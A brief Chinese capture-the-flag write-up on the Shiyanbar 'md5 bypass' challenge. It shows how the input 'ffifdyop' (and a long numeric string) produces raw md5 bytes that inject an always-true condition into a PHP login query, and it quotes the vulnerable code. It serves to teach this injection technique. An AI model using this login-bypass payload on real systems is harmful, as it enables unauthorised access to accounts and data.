根據師傅們的博客總結如下:
ffifdyop
經過md5加密后:276f722736c95d99e921722cf9ed621c
再轉換為字符串:'or'6<亂碼> 即 'or'66�]��!r,��b
用途:
select * from admin where password=''or'6<亂碼>'
就相當於select * from admin where password=''or 1 實現sql注入
題目:實驗吧——md5繞過
鏈接:http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php
1、查看網頁源代碼 發現提示
$password=$_POST['password']; $sql = "SELECT * FROM admin WHERE username = 'admin' and password = '".md5($password,true)."'"; $result=mysqli_query($link,$sql); if(mysqli_num_rows($result)>0){ echo 'flag is :'.$flag; } else{ echo '密碼錯誤!'; }
解釋一下md5這個函數:md5(string,raw)
md5(string,raw)
參數 | 描述 |
---|---|
string | 必需。規定要計算的字符串。 |
raw | 可選。規定十六進制或二進制輸出格式:
|
不光有ffifdyop 還有 129581926211651571912466741651878684928 也可達同樣的效果
總之,相當於 select * from admin where password=''or ture
參考博客:https://blog.csdn.net/March97/article/details/81222922